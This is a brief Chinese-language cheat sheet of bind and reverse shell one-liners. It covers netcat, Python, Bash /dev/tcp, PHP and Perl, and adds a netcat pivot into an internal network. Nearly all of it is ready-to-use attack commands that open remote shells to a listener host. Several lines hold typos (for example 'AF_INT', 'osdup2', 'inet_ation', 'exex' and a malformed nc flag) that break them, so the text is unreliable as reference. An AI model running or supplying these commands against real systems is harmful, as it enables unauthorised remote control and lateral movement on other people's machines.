正向shell
nc -lvp 4444 -e /bin/sh nc -lvp 4444 -c:windowssystem32cmd.exe
反向shell
在本地:
nc -lvp 9999
在目标主机 :
nc 本地ip 9999 -e /bin/sh //linux
一般情况下,目标主机没有反向nc ,使用其他工具或者其他语言代替
python反向shell
python -c 'import socket ,subprocess,os;s=socket,socket(socket.AF_INT,socket,socket.SOCK_STREAM);s.connect(("本地ip",9999));os.dup2(s.fileno(),0);osdup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash反向shell
bash -i >& /dev/tcp/192.168.1.4/9999 0>&1
php反向shell
php '$sock=fsockopen("本地ip",9999);exec("/bin/sh -i <&3 >&3 2>&3");'
perl反向shell
perl -e 'use socket;$i="本地ip";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($P,inet_ation($i))){open(STDIN,">&S");open(STDERR,">&S");exex("/bin/sh -i");};'
内网代理:
假设内网主机ip 是1.1.1.1
假设web主机ip 是 1.1.1.2
让本地ip 192.168.1.1能够访问到 1.1.1.2,但无法访问1.1.1.1
内网1.1.1.1 正向shell
nc -lvp 333 -e /bin/sh
web
nc - 192.168.1.1 3333 -c "1.1.1.1 3333"